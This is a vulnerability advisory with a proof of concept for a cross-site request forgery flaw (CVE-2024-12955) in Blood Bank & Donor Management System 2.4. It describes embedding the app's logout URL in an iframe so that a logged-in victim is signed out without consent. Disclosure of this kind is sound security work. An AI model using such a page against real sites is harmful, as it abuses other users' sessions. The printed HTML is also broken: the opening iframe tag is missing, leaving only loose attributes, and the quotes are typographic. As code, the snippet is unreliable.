Blood Bank and Donor Management System 2.4 Cross Site Request Forgery

• CVE-2024-12955

Blood Bank and Donor Management System version…

# Exploit Title: Blood Bank & Donor Management System 2.4 – CSRF Improper Input Validation
# Google Dork: N/A
# Date: 2024-12-26
# Exploit Author: Kwangyun Keum
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system/
# Version: 2.4
# Tested on: Windows 10 / Kali Linux with Apache and MySQL
# CVE: CVE-2024-12955

## Description:
Blood Bank & Donor Management System v2.4 suffers from a Cross-Site Request
Forgery (CSRF) vulnerability due to the absence of CSRF tokens for critical
functionalities such as logout. An attacker can craft a malicious iframe
embedding the logout URL and trick a victim into clicking it. This results
in the victim being logged out without their consent.

## Steps to Reproduce:
1. Deploy Blood Bank & Donor Management System v2.4.
2. Log in as any user.
3. Use the following PoC to demonstrate the issue:

“`html


src=”http://localhost/bbdms/logout.php”
style=”border:0px #FFFFFF none;”
name=”myLogoutFrame”
scrolling=”no”
frameborder=”1″
marginheight=”0px”
marginwidth=”0px”
height=”400px”
width=”600px”
allowfullscreen>



4. Save the above HTML code as logout_poc.html.
5.Open the file in a browser and click anywhere on the page to trigger the
logout.